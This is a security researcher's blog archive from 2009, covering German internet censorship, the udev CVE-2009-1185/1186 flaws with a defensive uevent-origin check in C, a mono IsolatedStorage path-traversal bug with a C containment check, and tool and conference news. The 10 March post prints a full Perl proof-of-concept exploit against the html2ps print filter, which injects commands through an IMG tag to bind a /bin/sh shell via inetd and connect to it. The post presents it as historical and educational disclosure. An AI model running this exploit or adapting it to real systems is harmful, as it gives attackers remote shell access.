I just grabbed a login on twitter but I am probably
not going to publish something there. It's just
a placeholder.
I reviewed a lot of messaging code (hal, upstart etc.) during the last few weeks
as a post-handling of the udev issue. I learned a lot and
that's great, but no new interesting issues so far.
Tuesday, 5 May 2009
Saturday, 18 April 2009
New WWW censorship (f)laws in .de
I am usually not into politics, but today it's necessary and I
hope I am not forced too often to write such statements.
It's about the German government introducing censorship
into the WWW while big companies spy on their employees.
Instead of bringing law to the people, flaw is brought to
the people.
The "Ministerium für Gedöhns" (in the words of Ex-Bukasch) has managed
to "Leym" the German Internet providers. Obediently, the majority of them
sign gag contracts with the BKA (source: Wikileaks).
Funny how quickly something like that happens, while data scandals
and mismanagement apparently cannot be dealt with.
It is probably all just a question of the right "Leym".
Following the familiar pattern, a handful of perverts
or terrorists is once again taken as a pretext to patronize
citizens a bit more.
From a purely technical point of view I would be interested in how much
latency is already lost through the mentioned blocks, filters, Bundestrojaner,
data retention, legal-interception implementations and so on.
That is probably why the T calls me three
times a week asking whether I want to upgrade to VDSL.
Thursday, 16 April 2009
udev trickery (CVE-2009-1185 and CVE-2009-1186)

While the security industry is making weird statements about
no-more-free-hugs and OSX vs. Windows exploitation fun,
I add my two cents on UNIX exploitation.
There have been two problems in all currently running udevd instances,
which ship on all major Linux distributions. Even if you
install SELinux or other hardening mechanisms, you are at risk
(please see the above screenshot of a targeted SELinux config).
The first problem (CVE-2009-1185) arises because the origin of
KOBJECT_UEVENT messages is not verified, so any user can spoof
messages that udevd takes for granted as coming from the kernel. This allows
some trickery to create a device named /dev/random with permission
0666 but the major and minor numbers of your root block device. The rest
is code. Alternatively, CVE-2009-1186, a standard stack buffer overflow,
could be exploited. Depending on the
configuration of the system, CVE-2009-1185 can also be exploited
with weird network interface names and the like, so in the end
chrooted/jailed or PrivSep'ed users have a good chance to get a full root shell.
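The missing check behind CVE-2009-1185 is the origin of the netlink message. As an added example in C (not udev's own code), here is a NETLINK_KOBJECT_UEVENT listener that accepts a message only if the sender's netlink id is 0, which is what the kernel uses, and, when SCM_CREDENTIALS are delivered, only if the sending uid is 0. The socket setup with SO_PASSCRED, the policy function uevent_origin_trusted and the return-value convention of recv_trusted_uevent are this example's own choices.

```c
#define _GNU_SOURCE            /* struct ucred, SCM_CREDENTIALS on glibc */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <linux/netlink.h>

/* Policy (this example's own): a uevent is trusted only when the netlink
 * sender id is 0, i.e. the kernel, and the credentials, if present, say uid 0.
 * A user-space socket is always assigned a non-zero nl_pid, so a spoofed
 * message from a normal user fails the first test. */
static int uevent_origin_trusted(uint32_t nl_pid, const struct ucred *cred)
{
    if (nl_pid != 0)
        return 0;
    if (cred != NULL && cred->uid != 0)
        return 0;
    return 1;
}

/* Bind to the kernel uevent multicast group (group 1) and ask the kernel
 * to attach sender credentials to every message. Needs CAP_NET_ADMIN. */
static int open_uevent_socket(void)
{
    int fd = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
    if (fd < 0)
        return -1;
    int on = 1;
    setsockopt(fd, SOL_SOCKET, SO_PASSCRED, &on, sizeof(on));
    struct sockaddr_nl snl = { .nl_family = AF_NETLINK, .nl_groups = 1 };
    if (bind(fd, (struct sockaddr *)&snl, sizeof(snl)) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Receive one uevent. Returns the payload length, 0 when the message was
 * dropped because its origin is not trusted, or -1 on a socket error. */
static ssize_t recv_trusted_uevent(int fd, char *buf, size_t buflen)
{
    struct sockaddr_nl snl;
    struct iovec iov = { .iov_base = buf, .iov_len = buflen };
    char cbuf[CMSG_SPACE(sizeof(struct ucred))];
    struct msghdr msg = {
        .msg_name = &snl, .msg_namelen = sizeof(snl),
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = cbuf, .msg_controllen = sizeof(cbuf),
    };
    ssize_t n = recvmsg(fd, &msg, 0);
    if (n < 0)
        return -1;

    /* Pick up the SCM_CREDENTIALS ancillary data the kernel attached. */
    const struct ucred *cred = NULL;
    for (struct cmsghdr *c = CMSG_FIRSTHDR(&msg); c != NULL; c = CMSG_NXTHDR(&msg, c))
        if (c->cmsg_level == SOL_SOCKET && c->cmsg_type == SCM_CREDENTIALS)
            cred = (const struct ucred *)CMSG_DATA(c);

    if (!uevent_origin_trusted(snl.nl_pid, cred)) {
        fprintf(stderr, "dropping uevent from nl_pid %u: not the kernel\n",
                (unsigned)snl.nl_pid);
        return 0;
    }
    return n;
}

int main(void)
{
    int fd = open_uevent_socket();
    if (fd < 0) {
        perror("uevent socket");
        return 1;
    }
    char buf[4096];
    for (;;) {
        ssize_t n = recv_trusted_uevent(fd, buf, sizeof(buf) - 1);
        if (n < 0)
            break;
        if (n == 0)
            continue;
        buf[n] = '\0';
        printf("uevent: %s\n", buf);   /* first line is e.g. add@/devices/... */
    }
    close(fd);
    return 0;
}
```

Run as root (or with CAP_NET_ADMIN) and plug in a USB device to see kernel uevents printed; a message injected from an unprivileged user-space netlink socket arrives with a non-zero nl_pid and is dropped by the policy function instead of being acted on.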
Tuesday, 24 March 2009
sharpen your .NET skills

I have had dozens of discussions about C# being a secure
language and that CLR/VM based languages should be used
with new projects in order to increase security. One argument
is that memory corruption can't happen any longer.
I agree, but always point out that C# code is not secure
automagically, even if the programmer's code is correct.
The runtime might be buggy as well! I recently read an
article in the famous German iX magazine about security measures
in .NET. One of the measures is the so-called IsolatedStorage
which allows you to store data in a secure way. Much like
a database, based on a token you can store/retrieve data
without your real filesystem being at risk. Nice thing,
and I coded an example server:
using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.IO;
using System.IO.IsolatedStorage;

class Server {
    // Writes one 256-byte record under "key" into the user's isolated storage.
    private static void store(string key, Byte[] b)
    {
        try {
            Console.WriteLine("Isolated storage @ {0}", key);
            IsolatedStorageFileStream fs = new IsolatedStorageFileStream(key, FileMode.Create);
            fs.Write(b, 0, b.Length);
            fs.Close();
        } catch {
            Console.WriteLine("Exception!");
        }
    }

    // Reads back the record stored under "key" (at most 256 bytes).
    private static Byte[] load(string key)
    {
        Byte[] b = new Byte[256];
        try {
            Console.WriteLine("IsolatedStorage load @ {0}", key);
            IsolatedStorageFileStream fs = new IsolatedStorageFileStream(key, FileMode.Open);
            fs.Read(b, 0, b.Length);
            fs.Close();
        } catch {
            Console.WriteLine("Exception!");
        }
        return b;
    }

    public static void Main()
    {
        Byte[] buf = new Byte[256];
        int cnt;
        string data = "";
        ASCIIEncoding ascii = new ASCIIEncoding();
        TcpListener l = new TcpListener(8080);
        l.Start();
        try {
            Socket s = l.AcceptSocket();
            // Every Receive() is taken as one command: "store <key>", "load <key>" or "quit".
            while (data.Trim() != "quit") {
                Array.Clear(buf, 0, buf.Length);
                if ((cnt = s.Receive(buf, buf.Length, 0)) == 0)
                    break;
                data = ascii.GetString(buf, 0, cnt);
                Console.WriteLine("Received: {0}", data.Trim());
                if (data.StartsWith("store ")) {
                    // The next Receive() carries the payload to be stored under the key.
                    Array.Clear(buf, 0, buf.Length);
                    if (s.Receive(buf, buf.Length, 0) == 0)
                        break;
                    store(data.Substring(6, data.Length - 6).Trim(), buf);
                } else if (data.StartsWith("load ")) {
                    Byte[] result = load(data.Substring(5, data.Length - 5).Trim());
                    s.Send(result);
                }
            }
        } catch {
            Console.WriteLine("Exception!");
        }
        l.Stop();
    }
}
You can connect to the server on TCP port 8080 and
store/load data via the telnet interface, for example.
Besides the ease of the code and the fact that it treats
TCP streams like messages, which could make trouble in
real networking environments, this code should be correct.
It fits perfectly as a localhost example. There is just
a problem with the IsolatedStorage itself!
Some versions of the mono runtime do not remove
"../" character sequences from the path component as they
should. So, depending on your configuration, you can
obtain funny results. On openSUSE 11.1, the storage
place is in ~/.config/.isolated-storage/
I already informed the maintainers and a fix is underway.
It's not a big issue, and I don't have any application in mind
that is actually vulnerable and uses IsolatedStorage this way.
File-system/storage tricks will be a major playground for
.NET/C# applications in future. In a non-public review
of a larger C# based "system" it turned out that it was possible to obtain
local root privileges by loading evil assemblies as
a result of tricking the application.
(depending on the implementation) all the
nasty things that we got rid of in native CPUs during
the last years: executable data, fixed addresses etc.
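To make the "../" problem concrete, here is an added C example (not mono's code and not the post's C# server) of the two halves of the check an isolated-storage layer needs: a whitelist on the key before it is joined to the base directory, and a lexical containment check on the joined path afterwards. The base directory uses the openSUSE 11.1 location quoted above under a constructed home directory; the key alphabet, the 64-byte key limit and all function names are this example's own.

```c
#include <stdio.h>
#include <string.h>
#include <limits.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif
#define MAX_PARTS 256

/* Constructed home directory; the relative location matches the post. */
#define STORAGE_BASE "/home/user/.config/.isolated-storage"

/* Naive join: what a runtime that passes the key straight through does.
 * A key such as "../../.bashrc" leaves the storage directory. */
static int unsafe_storage_path(const char *key, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s/%s", STORAGE_BASE, key);
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}

/* First half of the fix: accept only a single plain path component.
 * No '/', no leading '.' (so ".", ".." and hidden files are out), and a
 * small alphabet so odd bytes never reach the filesystem. */
static int storage_key_is_safe(const char *key)
{
    size_t len = strlen(key);
    if (len == 0 || len > 64 || key[0] == '.')
        return 0;
    for (size_t i = 0; i < len; i++) {
        char c = key[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '_' || c == '-' || c == '.';
        if (!ok)
            return 0;
    }
    return 1;
}

static int safe_storage_path(const char *key, char *out, size_t outlen)
{
    if (!storage_key_is_safe(key))
        return -1;
    return unsafe_storage_path(key, out, outlen);
}

/* Lexically normalise an absolute path: drop empty and "." components and
 * let ".." pop the previous one. No filesystem access, so it also works for
 * files that do not exist yet. Returns -1 on overflow. */
static int normalize_path(const char *in, char *out, size_t outlen)
{
    char tmp[PATH_MAX];
    const char *parts[MAX_PARTS];
    size_t n = 0, pos = 0;

    snprintf(tmp, sizeof tmp, "%s", in);
    for (char *p = strtok(tmp, "/"); p != NULL; p = strtok(NULL, "/")) {
        if (strcmp(p, ".") == 0)
            continue;
        if (strcmp(p, "..") == 0) {
            if (n > 0)
                n--;
            continue;
        }
        if (n == MAX_PARTS)
            return -1;
        parts[n++] = p;
    }
    if (n == 0) {
        snprintf(out, outlen, "/");
        return 0;
    }
    out[0] = '\0';
    for (size_t i = 0; i < n && pos < outlen; i++) {
        int w = snprintf(out + pos, outlen - pos, "/%s", parts[i]);
        if (w < 0)
            return -1;
        pos += (size_t)w;
    }
    return pos < outlen ? 0 : -1;
}

/* Second half of the fix: after joining, the normalised path must still
 * start with the base directory followed by a separator. */
static int path_inside_base(const char *path)
{
    char norm[PATH_MAX];
    size_t bl = strlen(STORAGE_BASE);
    if (normalize_path(path, norm, sizeof norm) != 0)
        return 0;
    return strncmp(norm, STORAGE_BASE, bl) == 0 && norm[bl] == '/';
}

int main(void)
{
    /* Constructed sample keys: one honest, one traversal, one hidden, one nested. */
    const char *keys[] = { "session-token.dat", "../../.bashrc", ".hidden", "a/b" };
    char p[PATH_MAX];
    for (size_t i = 0; i < sizeof keys / sizeof keys[0]; i++) {
        if (unsafe_storage_path(keys[i], p, sizeof p) == 0)
            printf("naive   %-18s -> %s (inside base: %s)\n", keys[i], p,
                   path_inside_base(p) ? "yes" : "NO");
        if (safe_storage_path(keys[i], p, sizeof p) == 0)
            printf("checked %-18s -> %s\n", keys[i], p);
        else
            printf("checked %-18s -> rejected\n", keys[i]);
    }
    return 0;
}
```

The two checks are deliberately redundant: the whitelist is what a storage API should enforce on its keys, and the containment check is what catches a runtime that forgot to, which is exactly the mono case described above.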
Friday, 20 March 2009
PcapSharp updated
You can find a new pcap# version of my mono pcap binding
on my website. It's better tested than the old version,
and supports packet dumping and offline capturing of packets
now as well as it supported online capturing in the past.
It is possible to read/analyze the pcap# dump files with
tcpdump and wireshark. I am not an expert for marshalling
C# types to plain C types, but I think I got it right :-)
Tuesday, 10 March 2009
Some news
This post satisfies two needs (except publishing code at all):
First, I hate how this blog automatically wraps my lines and
how it de-formats all things I am doing. I try to submit
pure HTML code now and hope it works. Second, I decided to
publish some old exploits of mine for historical, technical
and educational purposes. A recent law case in Germany showed
that jail-or-not is all about your intention. It is legal
to publish dual-use code or code that could be used to do
something evil if your intention is to make the world a more
secure place or to teach others how to protect themselves etc.
It is illegal to publish such code in order to commit a crime,
which is clearly and obviously not what I am doing.
The code is that old (2002) that there should rarely be any box at all
which still ships the vulnerable print filter that is exploited
here. So, except for teaching something, this code is useless.
The interesting thing about this piece is that the print filter didn't
accept spaces in the IMG tag. But read yourself:
#!/usr/bin/perl -W
# html2ps remote "lp" exploit. Opens shell on port 7350.
# If used for testing remote machines, /etc/printcap must
# contain appropriate remote printernames etc. and lpd must
# be set up correctly.
# (C) 2002 Sebastian Krahmer, proof of concept exploit.
# Brief problem description: lprng calls printfilters as any
# other print-spooling systems do. It calls them with UID of lp
# thats why you get lp-user shell later. The html2ps filter which is
# a perl script is called to convert the evil.html to .ps.
# However there it breaks because html2ps calls open() function insecurely
# and some other bad stuff is done too. It tries to convert the IMG embedded
# in the html and invokes some commands which give us access. Thats all. :)
sub usage
{
print "\n$0 <printhost> <remote-host>\n".
"\tprinthost -- name of printer in /etc/printcap\n".
"\tremote-host -- IP or hostname of host where shell appears\n".
"'$0 lp 127.0.0.1' is recommended for everyones own machine\n\n";
exit;
}
my $printhost = shift || usage();
my $remote = shift || usage();
print "Constructing evil.html ...\n";
open O, ">evil.html" or die $!;
print O<<__eof__;
<HTML>
<IMG SRC="|IFS=A;X=A;echo\${X}7350\${X}stream\${X}tcp\${X}nowait\${X}lp\${X}/bin/sh\${X}-i|dd\${X}of=/tmp/f;inetd\${X}/tmp/f">
</HTML>
__eof__
close O;
if (fork() == 0) {
exec("/usr/bin/lpr", "-P", $printhost, "evil.html");
}
wait;
sleep 3;
print "Connecting ...\n";
exec("/usr/bin/telnet", $remote, 7350);
Friday, 6 February 2009
James Bond seriously wounded in action

I am impressed. The readers of this little blog still seem to be what they learned as a kid on foreign
Sun's. Guerilla :-) No comment on my postings, never, or at least very rarely. But, it's really read!
The last posting produced > 700 hits in less than 2 days to the perl code morphing example.
Without actually really announcing it somewhere at big places.
Cleaned of accesses from the Google bot etc., there are still ~700 hits. That's great!
So, I will continue. From time to time :-)
As a thank-you I will post a picture I took at a car park on one of my walks through the city together with
a good friend of mine. We used to take large walks of about 3h or so, mostly in urban places,
dumpster-dive or attend closed conferences or events we were never invited to, shaking hands
with some big NATO generals for example. It's just a matter of who you say you are.
Wednesday, 4 February 2009
$_='print"\$_=\47$_\47;eval"';eval
If you enjoy self-generating, self-replicating or self-modifying code as much as I do,
you can have a look here. The exponential more-perl engine is probably
never executed in the 5th generation, unless you have plenty of RAM
and CPU power (e.g. you work for google:).
All samples you can download execute the same code at the end, even though
they need to un-nest and reorder the instructions until the original code,
including comments, is reached.
Wednesday, 28 January 2009
IPv6 NAT
During my last ITO project I worked on a solution to implement some kind of NAT
for IPv6. Packet-mangling solutions such as netfilter are missing IPv6 NAT for a good
reason: one of IPv6's design goals was the end-to-end principle, and NAT often gives
people a false feeling of security. NAT is one major reason why the VoIP breakthrough
came so late.
However, transparent proxying and redirection of connections is also done via NAT,
and that's where NAT for IPv6 makes sense: to set up spam traps, transparent
virus scanning or HTTP proxies. My solution works on Linux kernels >= 2.6.14,
running as a normal user-space daemon.
Wednesday, 7 January 2009
Happy new 2009!
The recent 25C3 was a funny event, although I missed a couple of friends to talk to.
So, I could use some time slots to talk to the OpenBSD folks about security,
which is always funny. Besides our differences about the meaning of exploitability,
they nevertheless do a good job and I highly respect their voluntary work, in
particular in a $$-driven (security) world. Even at such an event, about 2/3 of
the folks only talk about $$ and what kind of customer is waiting for new
'solutions'.
Thanks to the French telco guys for the free beer and the funny stories.